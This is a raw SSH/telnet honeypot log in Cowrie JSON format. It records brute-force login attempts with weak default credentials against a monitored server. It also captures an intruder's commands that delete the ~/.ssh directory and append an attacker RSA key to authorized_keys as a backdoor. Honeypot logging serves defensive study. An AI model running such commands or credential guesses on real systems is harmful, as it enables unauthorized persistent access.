{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:24:58.483717Z","src_ip":"212.227.235.229","session":"679690eda867"}
{"eventid":"cowrie.login.failed","username":"evan","password":"evan","message":"login attempt [evan/evan] failed","sensor":"my-vps","timestamp":"2025-08-26T02:24:59.557497Z","src_ip":"212.227.235.229","session":"679690eda867"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:25:00.818574Z","src_ip":"212.227.235.229","session":"679690eda867"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44380,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d0f92eb5649","protocol":"telnet","message":"New connection: 212.227.235.229:44380 (1.2.3.4:23) [session: 8d0f92eb5649]","sensor":"my-vps","timestamp":"2025-08-26T02:25:41.392201Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:25:41.600369Z","src_ip":"212.227.235.229","session":"8d0f92eb5649"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:25:41.656443Z","src_ip":"212.227.235.229","session":"8d0f92eb5649"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:26:17.855179Z","src_ip":"212.227.235.229","session":"306211dd78a3"}
{"eventid":"cowrie.session.closed","duration":180.2379240989685,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:26:17.860367Z","src_ip":"212.227.235.229","session":"306211dd78a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59630,"dst_ip":"1.2.3.4","dst_port":22,"session":"dec8732819ba","protocol":"ssh","message":"New connection: 212.227.235.229:59630 (1.2.3.4:22) [session: dec8732819ba]","sensor":"my-vps","timestamp":"2025-08-26T02:26:21.792571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:26:21.793491Z","src_ip":"212.227.235.229","session":"dec8732819ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:26:22.051997Z","src_ip":"212.227.235.229","session":"dec8732819ba"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-26T02:26:23.127530Z","src_ip":"212.227.235.229","session":"dec8732819ba"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:26:24.387146Z","src_ip":"212.227.235.229","session":"dec8732819ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43816,"dst_ip":"1.2.3.4","dst_port":22,"session":"12d3b1787e0d","protocol":"ssh","message":"New connection: 212.227.235.229:43816 (1.2.3.4:22) [session: 12d3b1787e0d]","sensor":"my-vps","timestamp":"2025-08-26T02:27:03.069349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:27:04.369355Z","src_ip":"212.227.235.229","session":"12d3b1787e0d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:27:04.370393Z","src_ip":"212.227.235.229","session":"12d3b1787e0d"}
{"eventid":"cowrie.login.success","username":"root","password":"Sepah@123","message":"login attempt [root/Sepah@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:27:08.658025Z","src_ip":"212.227.235.229","session":"12d3b1787e0d"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:27:09.336596Z","src_ip":"212.227.235.229","session":"12d3b1787e0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46024,"dst_ip":"1.2.3.4","dst_port":22,"session":"2175873a9b85","protocol":"ssh","message":"New connection: 212.227.235.229:46024 (1.2.3.4:22) [session: 2175873a9b85]","sensor":"my-vps","timestamp":"2025-08-26T02:27:45.088512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:27:45.089651Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:27:45.349923Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123...","message":"login attempt [root/abc123...] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:27:46.429832Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:27:46.970036Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:27:46.970823Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:27:46.972161Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:27:47.233800Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:27:47.866231Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:27:47.867127Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:27:48.128209Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:27:48.129238Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46040,"dst_ip":"1.2.3.4","dst_port":22,"session":"c293a10a4acc","protocol":"ssh","message":"New connection: 212.227.235.229:46040 (1.2.3.4:22) [session: c293a10a4acc]","sensor":"my-vps","timestamp":"2025-08-26T02:27:48.407829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:27:48.408571Z","src_ip":"212.227.235.229","session":"c293a10a4acc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:27:48.689089Z","src_ip":"212.227.235.229","session":"c293a10a4acc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:27:49.854009Z","src_ip":"212.227.235.229","session":"c293a10a4acc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:27:51.137741Z","src_ip":"212.227.235.229","session":"c293a10a4acc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46056,"dst_ip":"1.2.3.4","dst_port":22,"session":"711bd48af1af","protocol":"ssh","message":"New connection: 212.227.235.229:46056 (1.2.3.4:22) [session: 711bd48af1af]","sensor":"my-vps","timestamp":"2025-08-26T02:27:51.417550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:27:51.418302Z","src_ip":"212.227.235.229","session":"711bd48af1af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:27:51.699510Z","src_ip":"212.227.235.229","session":"711bd48af1af"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:27:52.866325Z","src_ip":"212.227.235.229","session":"711bd48af1af"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:27:53.149793Z","src_ip":"212.227.235.229","session":"2175873a9b85"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:27:53.150854Z","src_ip":"212.227.235.229","session":"711bd48af1af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"150.2","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 150.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:28:11.873634Z","src_ip":"212.227.235.229","session":"8d0f92eb5649"}
{"eventid":"cowrie.session.closed","duration":150.48663806915283,"message":"Connection lost after 150 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:28:11.878772Z","src_ip":"212.227.235.229","session":"8d0f92eb5649"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39512,"dst_ip":"1.2.3.4","dst_port":22,"session":"14dc2311c997","protocol":"ssh","message":"New connection: 212.227.235.229:39512 (1.2.3.4:22) [session: 14dc2311c997]","sensor":"my-vps","timestamp":"2025-08-26T02:28:12.168540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:28:12.307439Z","src_ip":"212.227.235.229","session":"14dc2311c997"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-26T02:28:12.596549Z","src_ip":"212.227.235.229","session":"14dc2311c997"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:28:27.311737Z","src_ip":"212.227.235.229","session":"14dc2311c997"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49506,"dst_ip":"1.2.3.4","dst_port":22,"session":"428fd84e6b50","protocol":"ssh","message":"New connection: 212.227.235.229:49506 (1.2.3.4:22) [session: 428fd84e6b50]","sensor":"my-vps","timestamp":"2025-08-26T02:29:05.443307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:29:05.444275Z","src_ip":"212.227.235.229","session":"428fd84e6b50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:29:05.704182Z","src_ip":"212.227.235.229","session":"428fd84e6b50"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345qwert","message":"login attempt [ubuntu/12345qwert] failed","sensor":"my-vps","timestamp":"2025-08-26T02:29:06.785196Z","src_ip":"212.227.235.229","session":"428fd84e6b50"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:29:08.047999Z","src_ip":"212.227.235.229","session":"428fd84e6b50"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":33646,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf5710396db4","protocol":"telnet","message":"New connection: 79.124.8.120:33646 (1.2.3.4:23) [session: cf5710396db4]","sensor":"my-vps","timestamp":"2025-08-26T02:29:39.016407Z"}
